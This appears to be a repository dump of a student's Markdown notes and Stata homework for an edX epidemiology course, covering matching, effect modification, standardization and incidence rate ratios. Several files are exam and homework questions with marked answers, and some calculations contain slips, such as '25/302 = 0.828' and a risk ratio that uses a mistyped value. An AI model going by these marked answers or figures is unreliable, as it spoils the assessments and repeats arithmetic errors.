| 8*0 | 8*0 \n E- | 0 | 0 | | | | | \n | | | | | | | \n E+ | 1 | 0 | 22 | 1/2 | 0 | 22*1/2 | 22*0 \n E- | 0 | 1 | | | | | \n | | | | | | | \n E+ | 0 | 1 | 8 | 0 | 1/2 | 8*0 | 8*1/2 \n E- | 1 | 0 | | | | | \n | | | | | | | \n E+ | 0 | 0 | 18 | 0 | 0 | 18*0 | 18*0 \n E- | 1 | 1 | | | | | \n | | | | | | | \n **Total** | | | | **1/2** | **1/2** | **22*1/2** |**8*1/2** \n\n```math\n\tOR=(SUM AD/T) / (SUM BC/T)= 22(1/2)/8(1/2)=2.75\n```\n\n### Conclusion ###\nSo the important piece to keep in mind is that if you have **matching in a case control study**, once you come to the analysis stage, **you still have to control for the matching factor as if it's still a confounder**. In this case, if you control using stratified analysis, you'll get the same answer you're learning using the formulas in biostatistics for doing matched analysis.\n\n## Effect Modification Example ##\nVideo 1: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-12_100.mp4 \nVideo 2: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-13_100.mp4\n \n**Confounding vs. Effect modification**: These are entirely different concepts of epidemiology. But they're often confused because they both **typically involve stratified analysis**. But they use **stratified analyses in different ways** to answer entirely different questions.\n\n### Effect Modification ###\n* Refers to an **exposure** having a **different** effect on the **outcome** in different groups of patients\n\t- Example: Personlized medicine\n* Detected by comparing stratum-specific estimates of the measure of effect (**sub-group analyses**)\n\nEffect modification means they are different: The effect of a drug, the effect of a treatment, the effect of an exposure is modified by the group of people you are looking at-- in that case, by the age of the people. \n \nThis is what I mean by effect modification, the value that we're giving to describe the effect of an exposure-- in in this case, the effect of a treatment, beta blocking-- differs. It depends on what type of person you are. In this case, in terms of a person's risk of having a cardiac complication.\n\n* **Effect Modifier**: Factor whose levels show different effect of the exposure on the outcome\n* Conclusion about Effect Modification is dependent on the chosen measure of effect (**Effect Measure Modification**)\n\n### Detection of Modification ###\n* Difficult\n* Must **distinguish** from other reasons for differences in stratum-specific estimates\n\t- bias\n\t- Confounding by other factors\n\t- Chance variation\n* Need **clinical/biological** argument\n\t- Prior justification to look for Effect Modification\n\n=> **Confidence Interval** gives you a range of values suggested by the data as being reasonable estimates for the odds ratios.\n\n### Ruling Out Chance Variation ###\n* Tests of homogeneity\n\t- Breslow-Day Test compares stratum-specific odd ratio estimates\n\t- Null Hypothesis: No Effect Modification\n\t- Interaction terms in regression models\n* Examine stratum-specific confidence intervals\n* Problem: All influenced by sample size (e.g. have not enough people)\n\n### Presenting Results in the Presence of Effect Modification ###\n* Present stratum-specific results (**best option**) - Most information you can give the reader\n* Calculate weighted-average of stratum specific estimates (e.g. Mantel-Haenszel Estimates)\n\t- Not optimal theoretically\n\t- Single value cannot reflect different effects\n\t- Description of average effect for unspecified population\n* Standardization\n\t- Describes average effect of the exposure **in a standard population**\n\n## Effect Modification - Standardization ##\nDon't pull those (sex, age groups etc.) different numbers into one single average using Mantel-Haenszel's formula. But I said there is another option to get one number to describe **the average effect of that risk factor**, that exposure, **that treatment in a specific population**.\n\n### Components of (Direct) Standardization ###\n* Select a **Standard Population**\n* Stratifiy by confounding factor or effect modifier\n\t- Example: Age categories\n* Calculate confounder specific (age-specific) outcome risks for exposed (smokers) and non-exposed (non-smokers)\n* Estimate average risk in standard population, if \n\t- Everyone was exposed\n\t- Everyone was non-exposed\n\t- Make comparison\n* Estimates counterfactual risks\n\n**It's a way to display the effect of a risk factor when you have effect modification by describing its average effect in a single specified population.** \n\n### Choice of Standard Population ###\n* Internal Population\n\t- Full data set_backend_name\n\t- Exposed individuals\n\t- Non-Exposed individuals\n* External Population: E.g. USA, every year, publishes mortality rates that are standardized \n* Results describe average effect of the exposure in that standard population\n* Results may change with different standard population\n\n### Standardizatoin and Causal Inference ###\n* If no residual confounding, standardization yields estimates of counterfactual outcomes\n* Standardization involves two weighted analysis (**Inverse Probability Weighting**:\n\t- For each age group, exposed individuals reweighted to represent standard population\n\t- For each age group, non-exposed individuals reweighted to represent standard population\n\n**So standardization is linked to this notion of counterfactuals, linked to this notion of causal inference.**\n\n\n## Matching - Example # 2 ##\nVideo 1: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-14_100.mp4 \nVideo 2: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-15_100.mp4 \nVideo 3: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-16_100.mp4 \nMatching is based on stratification and gives you an answer to two questions:\n* What would happen in the standard population if everyone was given the exposure \n* What would happen in this population if no one was given the exposure\n\n### Example: Age-Standardized Risks of Death among Smokers and Non-Smokers in the Framingham Heart Study ###\n\n#### Components of Standardization ####\n* Standard Population: **4434 individuals** attending 1956 exam of the Framingham Heart Study\n* Stratify by confounding factor (agecat)\n* Calculate confounding-specific **outcome risks** for exposed (**smokers**) and non-exposed (**non-smokers**)\n* Estimate average risk in standard population, if\n\t- Everyone was exposed\n\t- Everyone was non-exposed\n\n#### Data ####\n\n Age <= 40 | Died | Survived | Total\n------------ | --- | -------- | ------\n Smokers | 67 | 385 | 452 \n Non-Smokers | 25 | 277 | 302 \n Total | 92 | 662 | **754** \n\n* Estimated Risk (cumulative incidence)= Risk of dying if you're young= 67/452= 0.14823009\n* Estimated risk of dying (cumulative incidence of death) among young nonsmokers= 25/302= 0.08278146\n\n\n 40 < Age <= 50 | Died | Survived | Total\n----------------- | --- | -------- | ------\n Smokers | 266 | 689 | 955 \n Non-Smokers | 110 | 574 | 684 \n Total | 376 | 1263 | **1639** \n\n 50 < Age <= 60 | Died | Survived | Total\n----------------- | --- | -------- | ------\n Smokers | 286 | 281 | 567 \n Non-Smokers | 312 | 500 | 812 \n Total | 598 | 781 | **1379** \n\n Age > 60 | Died | Survived | Total\n------------ | ---- | -------- | ------\n Smokers | 169 | 38 | 207 \n Non-Smokers | 315 | 140 | 455 \n Total | 484 | 178 | **662** \n\n### Questions ###\n* What is the estimated # Deaths of everyone smoked?\n* What is the estimated # Deaths if no one smoked?\n\n#### Standardization ####\nThere are 4434 individuals to calculate Expected # of Deaths:\n1. Fill Out Expected # Deaths for Smokers\n2. Expected # of Deaths for Non-Smokers\n\n Standard Population (Age Group) | Number | Risk if all were Exposed (Smoker) | Expected # of Deaths | Risk if all Non-Exposed (Non-Smoker) | Expected # of Deaths \n-------------------------------- | -------- | --------------------------------- | -------------------- | ------------------------------------ | ----------------------\n <= 40 | 754 | 67/452 = 0.1482 | 754*0.1482 = 111.74 | 25/302 = 0.828 | 754*0.828 = 62.43 \n (40, 50] | 1639 | 266/955 = 0.2785 | 1639*0.2785 = 456.46 | 110/684 = 0.1608 | 1639*.1608 = 263.55 \n (50, 60] | 1379 | 286/567 = 0.5044 | 1379*0.5044 = 695.57 | 312/812 = 0.3842 | 1379*0.3842 = 529.81 \n > 60 | 662 | 169/207 = 0.8164 | 662*0.8164 = 540.46 | 315/455 = 0.6923 | 662*0.6923 = 458.30 \n **Total** | **4434** | | **1804.23** | | **1314.09** \n\n##### Standardized Risks #####\n* Smokers: 1804.23/4434=0.4059\n* Non-Smokers: 1314.09/4434= 0.2964\n* Standardized Risk Ratio: 0.4069/0.2964= 1.37\n\n##### Standardization and Inverse Probability Weighting (IPW) #####\nExample: Standardized Risk for Smokers: Expected # of death in youngest age group: **111.74** \n\n```math\n111.74 = (smokers risk) x (size of standard population) \n = (67/452) x (754) \n = (67/452) x (452) x (754/452) \n = (67/452) x [ (452) x (weight) ] \n```\n\nYoung Smokers in data are being re-weighted to represent young part of standard population and to determine expected outcome in standard population \n\n```math\nweight = 754/452 = 1/P(Smoking|Age <= 40) \n = 1/P(Exposure|Age <= 40) \n = 1/P(Exposure|Confounder) \n = 1/Propensity Scope \n```\n\n###### Alternative: Propensity Scores ######\nSimilarly for Non-Smoker Standard Population: Young non-smokers in data are weighted by\n\n```math\nweight = 1/P(Non-Smoker|Young in data)\n = 1/(1-Propensity Scope)\n```\n\n### Conclusion ###\n* Standardization provides estimates of counterfactual outcomes\n\t- # Deaths is everyone smoked\n\t- # Deaths is no one smoked\n* Estimates **causal effect** of smoking if there are no other confounders\n* Standardization **re-weights** data by functions of the Propensity Score\n\n\n## Effect Modification - Confounding vs. Effect Modification ##\nVideo: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-17_100.mp4\n* Independent concepts\n\t- Confounding: Problem that must be corrected; In other words **confounding is a problem**\n\t- Effect Modification: Truth\n* Both can be detected via stratification\n* Involve different comparisons\n\n## Effect Measure Modifier: Question ##\nIf a factor confounds the association between exposure and outcome, it cannot be an effect measure modifier.\n* True\n* => **False**\n\n\n\n" }, { "alpha_fraction": 0.7165729403495789, "alphanum_fraction": 0.7416702508926392, "avg_line_length": 56.75, "blob_id": "f4b4915a2ffff81e7f7981512c36ea285a64ae58", "content_id": "9e22a9354820ab72f90d5215ff9cb3cf0fa6366f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2319, "license_type": "no_license", "max_line_length": 376, "num_lines": 40, "path": "/PH207x/homework/ten/High Blood Pressure and CHD Incidence.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# High Blood Pressure and CHD Incidence #\nUse Stata and the NHLBI data set to create the two categories of high blood pressure (highbp1) \n\n```stata\n\tgenerate highbp1=.\n\treplace highbp1=1 if (sysbp1>=140 | diabp1 >= 90)\n\treplace highbp1=0 if (sysbp1<140 & diabp1<90)\n```\n\n**(Note: There are no missing data on sysbp1 and diabp1. If data were missing on both sysbp1 and diabp1 then it should also be missing for highbp1. If data were missing on diabp1 only and sysbp1 >= 140 then highbp1 =1, otherwise highbp1 should be missing. Similarly, if data were missing on sysbp1 only and diabp1 >= 90 then highbp1 =1, otherwise highbp1 should be missing.)**\n\n##### 1. What is the incidence rate ratio of stroke comparing those with high blood pressure to those without high blood pressure? Hint: The variable for stroke in the dataset is “stroke” and the number of years a person was followed for stroke is recorded in the “timestrk” variable. #####\n> **Hint1:** Just a hint (I had this problem) - make sure you put data for the right sex in the right field (somehow I was putting results for males into Q3 and females into Q2 :))\n\n```stata\n\tir stroke highbp1 timestrk\n```\n\n##### 2. What is the incidence rate ratio (rounded to two decimal points) for the association between high blood pressure (highbp1) and the rate of stroke among men? Hint: Use the variable (sex1). #####\n\n```stata\n\tir stroke highbp1 timestrk, by(sex1)\n```\n\n##### 3. What is the incidence rate ratio (rounded to two decimal points) for the association between high blood pressure (highbp1) and the rate of stroke among women? #####\n\n```stata\n\tir stroke highbp1 timestrk, by(sex1)\n```\n\n##### 4. Conduct a test of homogeneity to evaluate whether the association between high blood pressure (highbp1) and the rate of stroke is different by sex. Based on this test, is there evidence that the difference between the sex-specific incidence rate ratios are more than just random sampling variability? #####\n* Yes\n* No\n\n##### 5. Based on these results, what are the options for properly reporting the association between high blood pressure (highbp1) and the rate of stroke? #####\n* A. Sex-specific incidence rate ratios \n* B. Pooled (Mantel-Haenszel) incidence rate ratio \n* C. Standardized incidence rate ratio \n* D. Choices A or B \n* E. Choices A or C \n" }, { "alpha_fraction": 0.7306461930274963, "alphanum_fraction": 0.740243136882782, "avg_line_length": 38.04999923706055, "blob_id": "eb1d7df5936e8659d711f3373e6c2183ebd33968", "content_id": "dfca33242f738728728d570ddca06e2c6fb08c8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1563, "license_type": "no_license", "max_line_length": 256, "num_lines": 40, "path": "/PH207x/homework/ten/More Regression.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# More Regression #\n\n``stata\n\tregress nickel vanadium\n\ttwoway (scatter nickel vanadium)\n```\n\n##### 1. Examine the relationship between vanadium (another marker of oil in sediment) and nickel using a scatter plot. Does this relationship appear linear? #####\n* Yes\n* No \n\n##### 2. How many outliers do you observe in this scatterplot? #####\nAs the investigator, it is important to determine the true cause of any observed outliers. If these are a result of error they should be removed, however outliers may also be indicators of a real but unusual occurrence that warrants further investigation. \n\n##### 3. How much does nickel increase, on average, for a one mg/kg increase in vanadium? #####\nFit a linear regression model with nickel as the outcome and vanadium as the explanatory covariate (Model 4). Use this model to answer questions 3 and 4.\n\n```stata\n\tregress nickel vanadium\n```\n\n##### 4. How much does nickel increase, on average, for a 10 mg/kg increase in vanadium? #####\n\n```stata\n\tregress nickel vanadium\n```\n\n##### 5. In Models 1 and 2 we saw that nickel levels seemed to increase each month. Does adding month to the model with vanadium as an explanatory covariate substantially improve the fit? #####\n\n```stata\n\tregress nickel vanadium\n\tregress nickel month vanadium\n```\n\n##### 6. Think about the results from the various models. Compare the adjusted R-squared for Model 2 with that from Model 5. Does it appear that vanadium is a stronger predictor of nickel levels than month? #####\n\n```stata\n\tregress nickel month\n\tregress nickel vanadium\n```\n\n" }, { "alpha_fraction": 0.8392857313156128, "alphanum_fraction": 0.8392857313156128, "avg_line_length": 17.66666603088379, "blob_id": "37cf9d544cd204d809b57a3bf6a9279759360600", "content_id": "63f30adab27a78cf332fc84ea5f1e2a6f1598808", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "no_license", "max_line_length": 22, "num_lines": 3, "path": "/README.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Machine-Learning\nMy Collection\nDecision Tree Learning\n" }, { "alpha_fraction": 0.48162275552749634, "alphanum_fraction": 0.5828710198402405, "avg_line_length": 61.673912048339844, "blob_id": "66d34b6ff097de5adb0ed160ab3df1693de821bc", "content_id": "a1dfa295a769a751bb92649d92b8d442c4761197", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2884, "license_type": "no_license", "max_line_length": 548, "num_lines": 46, "path": "/PH207x/homework/four/Incidence Rate Ratio Blood Pressure and CHD.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Incidence Rate Ratio Blood Pressure and CHD\nThe following table uses data from the NHLBI teaching data set and displays the blood pressure distribution for 4,434 participants in the Framingham Heart Study attending an examination in 1956.\n\nFor each blood pressure category, the table displays the number of subjects with existing Coronary Heart Disease (CHD) at that exam (Prevalent Cases of CHD). It also shows, for those subjects who did not have CHD at the 1956 exam, the number of new cases of CHD during a 24 year follow-up period and the total amount of person-years of follow-up. Follow-up for each subject began in 1956 and ended with the development CHD (fatal or non-fatal), death from another cause, loss to follow-up, or the end of the follow-up period (whichever came first).\n\n## Blood Pressure and CHD\n> Group | Blood Pressure Category | # of subjects | Prevalent cases of CHD | # developing CHD during follow-up | Total Years of follow-up\n> ------------- | -------------------------- | ------------- | ---------------------- | --------------------------------- | -------------------------\n> I | SBP<140 and DBP<9 | 2815 | 88 | 547 | 55384.42\n> II | 140<=SBP<160 or 90<=DBP<95 | 781 | 39 | 214 | 13191.79\n> III | 160<=SBP or 95<=DBP | 838 | 67 | 285 | 12348.94\n\n##### Q1. What is the Incidence Rate Ratio for developing CHD for participants in Blood Pressure Groups II or III combined (exposed group) compared to participants in the Blood Pressure Group I (non-exposed group)? #####\n\n=> Rate Ratio= ?\n\n> Group | Incidence Rate\n> ------------- | -------------\n> II or III | (214+285)/(12348.94+13191.79)= 0.0195374212\n> I | 547/55384.42=0.00987642\n\nRate Ratio: RR= 0.0195374212 / 0.00987642= **1.978187828**\n\n\n##### Q2. What is the Incidence Rate Ratio for developing CHD for participants in Blood Pressure Group III (exposed group) compared to participants in the Blood Pressure Group I (non-exposed group)? #####\n\n=> Incidence Rate Ratio= ?\n\n> Group | Incidence Rate\n> ------------- | -------------\n> III | 285/12348.94=0.0230789\n> I | 547/55384.42=0.00987642\n\nRate Ratio: RR= 0.0230789 / 0.00987642= **2.3367678**\n\n\n##### Q3. What is the Incidence Rate Ratio for developing CHD for participants in Blood Pressure Group II (exposed group) compared to participants in the Blood Pressure Group I (non-exposed group)? #####\n\n=> Incidence Rate Ratio= ?\n\n> Group | Incidence Rate\n> ------------- | -------------\n> II | 214/13191.79=0.01622221\n> I | 547/55384.42=0.00987642\n\nRate Ratio: RR= 0.01622221 / 0.00987642= **1.6425193**\n\n" }, { "alpha_fraction": 0.7494385838508606, "alphanum_fraction": 0.7529675960540771, "avg_line_length": 78.84615325927734, "blob_id": "4ce1c911336084bb02a9c09b78f5e4d80621511f", "content_id": "02caa5cb71f5ec9869f1d084857479ebaae48752", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3133, "license_type": "no_license", "max_line_length": 774, "num_lines": 39, "path": "/PH207x/homework/seven/Toxins and Parkinson's Disease Cohort Study.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "#Toxins and Parkinson's Disease Cohort Study#\n> An investigator, Dr. Park, is interested in evaluating whether there is an association between exposures to toxins and risk of developing Parkinson’s disease. She constructs a cohort of men and women that are living in her state in 1985 and every year, they are asked to complete a questionnaire about exposures at work and at home and whether they have been diagnosed with Parkinson’s disease. The participants in Dr. Park’s study contribute information on their changing toxin exposures over time for as long as they are residents in that state and for any year that they complete the questionnaire. As new people move into the state, they are enrolled in her cohort and remain in the cohort for as long as they are residents in the state and complete the questionnaire.\n\n#### 1.Should Dr. Park include people who reported that they had Parkinson’s at the time that they were recruited? ####\n> Yes \n> => **No** \n\n\n#### 2.Does Dr. Park need to be concerned about selection bias? ####\n> => **Yes, if people who were at greater risk of developing Parkinson’s were more likely to be exposed and were also more likely to participate in the study** \n> No, because it is a prospective cohort study so selection biases are not a concern \n\n\n#### 3.If those who are exposed to toxins are more likely to drop out of the study and more likely to develop Parkinson’s disease, what effect with this have on the estimated relative risk compared to the true relative risk? ####\n> **Hint1:** I think the study hypothesis - there is an association btwn toxin and Parkinson, so the null is opposite to the study hypothesis i.e Ho= there is no association between the two. More exposed ppl are likely to develop the disease, and if these ppl drop out of the study, you will find the end result to be less ppl with the disease and likely to conclude there is no association btwn the two, which is, what do you think? away or towards or no effect to the Ho? \n> \n> No effect \n> => **Biased towards the null** \n> Biased away from the null \n\n\n#### 4.Is this an open cohort or closed cohort? Why? ####\n> Closed, because exposure at baseline is used for all follow-up \n> Open, because loss to follow-up and competing risks are still a problem in this population-based study \n> Closed, because risk ratios are the most appropriate measure to compare toxin levels and Parkinson’s risk \n> => **Open, because people can enter and exit the cohort over the follow up time of the study**\n\n#### 5.True or False: Based on the data collected in her study, Dr. Park will be able to calculate absolute measures of Parkinson’s disease incidence. ####\n> False \n> => **True** \n\n> Absolute risk (incidence, prevalence): \n> Incidence = number of new cases of a disease occurring in a specified time period divided by the number of individuals at risk of developing the disease during the same time\n\n#### 6.Because Dr. Park conducted a prospective cohort study instead of a cross-sectional study, she can be less concerned about ####\n> Confounding \n> Bias \n> => **Reverse causation** \n> Chance \n\n\n" }, { "alpha_fraction": 0.6956764459609985, "alphanum_fraction": 0.7379358410835266, "avg_line_length": 41.916168212890625, "blob_id": "6d355b7d8519ee54624943ae7b9cb7083f02c137", "content_id": "8472729dcca32a763a84cdda3b85fe77d112c20c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7211, "license_type": "no_license", "max_line_length": 550, "num_lines": 167, "path": "/PH207x/exam/exam_part1.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Infant Cry Time #\nIn this series of questions, we examine data from a study of 158 infants who visited Northbay Healthcare in Solano County, California for a Vitamin K shot. Assume that the infants in the study are a representative random sample from all infants in Northbay Healthcare. \n \nNurses administered a Vitamin K shot to each infant. Infants were randomized to two different protocols to study how to reduce pain experienced by the infants due to the shot. The infants were divided into two groups – the control group, where standard protocol for handling the infants was used; and an intervention group, where mothers held their infants prior to, during, and after administration of the shot. Pain was measured using the Neonatal Infant Pain Score (NIPS) (Lawrence et. al 1993). The variables in the dataset are described below: \n\n* id – unique identifier for each infant\n* group – 1 if intervention group, 0 if control\n* pain0 – NIPS score 0 seconds after shot\n* pain30 – NIPS score 30 seconds after shot\n* pain60 – NIPS score 60 seconds after shot\n* pain120 – NIPS score 120 seconds after shot\n* crytime – total time that the infant cried in seconds\n \nThese data were made available through SOCR . (www.socr.ucla.edu/) \n \nSource: Lawrence J, Alcock D, McGrath P, Kay J, MacMurray SB, Dulberg C. (1993) The development of a tool to assess neonatal pain, Neonatal Network, 12:59-66.\n\n\n## Exploratory Analysis ##\nBefore jumping into analyzing the babies.dta dataset, first explore the dataset using summary statistics and graphical analyses. \n\n1. Make a boxplot of cry time by group. According to the boxplot, which group has more variability in cry time? \n* **control**\n* intervention \n\n```stata\n\tgraph box crytime, by(group)\n```\n\n2. Using the central limit theorem, construct a 95% confidence interval for the average total cry time for infants in the control group and infants in the intervention group. For this question only, assume that the standard deviation of cry time within each group is known and is equal to 22 seconds. \n \n\nn=sample size= 158 \n \n```stata\n\tmean crytime, over(group)\n```\n> [ x⁻-1.96*σ/SQRT(n), x⁻+1.96*σ/SQRT(n), ] \n \n**Control** \n> Construct a 95% confidence interval for average total cry time for infants in the control group \n \n* Lower Bound: 34.351151 \n* Upper Bound: 44.053909 \n \nn=sample size= 79 \nσ=standard deviation= 22s \nx⁻=39.20253 \n```stata\n\tdi 39.20253 - 1.96*22/sqrt(79)\n\tdi 39.20253 + 1.96*22/sqrt(79)\n\tci crytime if group==0\n```\n \n**Intervention**\n> Construct a 95% confidence interval for infants in the intervention group \n \n* Lower Bound: 24.756211 \n* Upper Bound: 34.458969 \n \n```stata\n\tdi 29.60759 - 1.96*22/sqrt(79)\n\tdi 29.60759 + 1.96*22/sqrt(79)\n```\n\n## Two-sample Non-parametric Test ##\nNow, we examine the relationship between cry time and group among infants at Northbay. \n\n1. Suppose we wish to perform a two-sample test, but we do not want to make any normality (or other strong parametric) assumptions. Conduct an appropriate non-parametric test to test whether the distribution of cry time is the same in both groups at the 0.05 level of significance. \n \n```stata\n\tranksum crytime, by(group)\n```\n=> What is your p-value: **0.0080** \n \n**Your conclusion from the test?** \n* there is evidence that the *means* of the two groups are different (specifically, there is evidence that the mean is higher in the control group) \n* there is not evidence that the *means* of the two groups are different \n* none of the above \n\n2. Assuming randomization was successful and all participants complied with their assigned exposure, which of the following should we be concerned about: \n* Confounding by sex of the infant \n* Confounding by the amount of pain experienced by the infant \n* Effect modification by sex of the infant \n* Misclassification of the exposure status of the infant \n\n\n## Linear Regression ##\nIn the babies.dta full dataset, generate a covariate called painind defined as 1 if the infant experienced severe pain upon receiving the shot (pain0 = 7) and as 0 otherwise. In Stata, you can use the commands: \n \n```stata\n\tgenerate painind = 0\n\treplace painind = 1 if pain0 == 7\n```\n \nFit a linear regression model with total cry time as the outcome; and with group and painind (the severe pain indicator) as covariates. The regression model is: \n \n> Y_i = β_0 + β_1*group_i + β_2*painind_i + ε_i \n> where ε_i ~ N(0,σ²).\n\n1. **Using the notation from the model above, what are your estimates of the regression coefficients and residual standard deviation?** \n \n```stata\n\tregress crytime group painind\n```\n \n* β_0= **29.78**\n* β_1= **-7.679168**\n* β_2= **12.61215**\n* σ= **21.766**\n\n2. **Using the fitted regression model, estimate the average change in cry time for infants with severe pain versus those without severe pain, holding group constant. Provide a 95% confidence interval for this estimate.** \n \n```stata\n\tregress crytime group painind\n```\n \n* Estimate: **12.61215** \n* 95% Confidence interval Lower Bound: **5.235661**\n* 95% Confidence interval Upper Bound: **19.98863**\n\n3. **Again, use the notation above for the regression model. The correct interpretation for β_1 is:**\n \n* Infants in the intervention group have β_1 times the risk of experiencing an increase in cry time compared to infants in the control group \n* Infants in the intervention group have β_1 times the risk of experiencing an increase in cry time compared to infants in the control group after controlling for pain experienced by the infant \n* Infants in the intervention group on average have β_1 change in cry time compared to the control group. \n* Infants in the intervention group on average have β_1 change in cry time compared to the control group, after controlling for severity of pain experienced by the infant upon receiving the shot.\n\n\n4. **Using the regression model, estimate the average cry time in the following groups:**\n \n* Control group infants with severe pain upon receiving the shot: **42.3955**\n```stata\n\tregress crytime group if group==0 & painind==1\n```\n* Control group infants without severe pain upon receiving the shot: **29.7833**\n```stata\n\tregress crytime group if group==0 & painind==0\n```\n* Intervention group infants with severe pain upon receiving the shot: **34.7163**\n```stata\n\tregress crytime group if group==1 & painind==1\n```\n* Intervention group infants without severe pain upon receiving the shot: **22.1042**\n```stata\n\tregress crytime group if group==1 & painind==0\n```\n\n\n5. **Without using the regression model, estimate the mean cry time in the following groups:**\n \n* Control group infants with severe pain upon receiving the shot: **40.64407**\n```stata\n\tregress crytime group if group==0 & painind==1\n```\n* Control group infants without severe pain upon receiving the shot: **34.95**\n```stata\n\tregress crytime group if group==0 & painind==0\n```\n* Intervention group infants with severe pain upon receiving the shot: **36.91489**\n```stata\n\tregress crytime group if group==1 & painind==1\n```\n* Intervention group infants without severe pain upon receiving the shot: **18.875**\n```stata\n\tregress crytime group if group==1 & painind==0\n```\n\n\n\n" }, { "alpha_fraction": 0.6134928464889526, "alphanum_fraction": 0.6444001197814941, "avg_line_length": 47.467742919921875, "blob_id": "582597629eeee3afd9c60ad751a741b9c6fc1853", "content_id": "8722a79d4e9d1a65674faceeb4c3c2396fd34795", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3009, "license_type": "no_license", "max_line_length": 343, "num_lines": 62, "path": "/PH207x/excercises/Lesson7/Odds Ratio.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Odds Ratio #\n> Suppose we have a disease (e.g. lung cancer) \n> And two groups (e.g. smokers, non-smokers) \n> \n> => Odds Ratio quantifies the relationship \n> \n> Relative odds (OR)= ( P(D|S)/(1-P(D|S)) ) / ( P(D|S_c) / (1-P(D|S_c)) ) \n> D is equal to disease \n> S is equal to smokers \n> S_c is equal to non-smokers\n\n## Theory for odds ratio ##\n\n | Exposed | Unexposed | Total\n---------- | ------- | --------- | ----- \nDisease | a | b | a+b\nNo Disease | c | d | c+d\nTotal | a+c | b+d | n\n\n> Relative odds (OR)= ( ^P(D|E)/(1-P^(D|E)) ) / ( ^P(D|E_c) / (1-^P(D|E_c)) ) \n> = (a/(a+c))/(c/(a+c)) / (b/(b+d))/(d/(b+d)) \n> = a*d / b*c\n\n> Approx. Normal: \n> ^se[ln(^OR)]= sqrt( 1/a + 1/b + 1/c + 1/d )\n\n## Berkson's Fallacy ##\nHe quantified the fallacy (sampling error)\n\n\n## Yule Effect (Simpson's Paradox) ##\n> Woman who could be classified as smokers/non-smokers in a 20 year follow-up of a one-in-six survey of the electoral roll in 1972-1974 in Whickham, UK.\n\n | Smokers | Non-Smokers | Total\n---------- | ------- | ----------- | ----- \nDead | 139 | 230 | 369\nAlive | 443 | 502 | 945\nMortality | 0.239 | 0.314 | 0.281\n\n> Use Decomposition Rule / Proportion / Mean \n> The composition is the story: You should not compare the means of two groups if the composition are different. Because you might just be confounding a lot of things together and blurring the issue at stake\n\n### Yule Effect Demonstration ###\n> Imagine you are a researcher studying YSS and the drugs that might prevent it. You decide to perform an experiment to test whether or not the promising drug Twoohsevenex is effective at preventing YSS. \n> \n> You perform a study by taking 200 men and 200 women, all of whom are at risk but do not currently have YSS, and separating them randomly into two groups. The \"treated\" group receives Twoohsevenex, while the control group recieves a placebo. \n> \n> At a follow up exam 5 years later, you observe the following results (Patients with YSS/All Patients in Category): \n> \n> Your results:\n\n | Treated | Control\n------ | ------- | -------- \nMen | 40/100 | 45/100\nWoman | 25/100 | 30/100\nTotal | 65/200 | 75/200\n\n> Your colleague, Doctor Drummond, insists that the results of his study of 2000 patients show that untreated patients do better on average than those recieving Twoohsevenex. \n> \n> Being a diligent statistician, you explore his results and find that within each sex/treatment group, his patients fared similarly to your own. Still, on the whole, his study showed that the untreated group did better. \n> \n> Use the sliders below to adjust the proportions of men and women in each group in a study of 2,000 people and find a case in which the aggregate performance of each treatment category makes it appear that Twoohsevenex is worse for patients than the placebo even though within each gender category, Twoohsevenex patients clearly fared better. \n\n\n" }, { "alpha_fraction": 0.7519999742507935, "alphanum_fraction": 0.7671111226081848, "avg_line_length": 92.5, "blob_id": "2d3e9e09df5cc4c136803d78688004bf659da352", "content_id": "b9296663f5ec74e15bc6d39d00a613202871a28d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1125, "license_type": "no_license", "max_line_length": 512, "num_lines": 12, "path": "/PH207x/homework/ten/Pesticide Exposure and Cancer.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Pesticide Exposure and Cancer #\nDr. Patel is interested in examining whether pesticide exposure is associated with a rare form of cancer. Since it is difficult to find enough cases to study, she decides to try and identify all cases in a large region. Since men and people younger than 50 are both more likely to be exposed to pesticides and more likely to develop this form of cancer, she obtains a random sample of people that did not develop the cancer living in the same region, matched to the case within 5 years of age and the same sex. \n \n##### 1. True or False: In this study, the matching eliminates the association between pesticide use and age. #####\n* True\n* False \n\n##### 2. First, Dr. Patel conducts an analysis that ignores the matching in the design and finds that the odds of developing cancer is 1.35 times greater among those exposed to the pesticide compared to those who were not exposed. If she then conducted another analysis that takes the matching into account, she would likely find an association of. #####\n* Less than 1.00 \n* 1.00 \n* Greater than 1.00 \n* Not enough information is provided \n\n\n" }, { "alpha_fraction": 0.7780026793479919, "alphanum_fraction": 0.7800269722938538, "avg_line_length": 91.5625, "blob_id": "0a1151b19d56772d531079a6053cb5908770ef3f", "content_id": "2b514489335fe80131c71c4276ee02e3dc8a19a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1482, "license_type": "no_license", "max_line_length": 381, "num_lines": 16, "path": 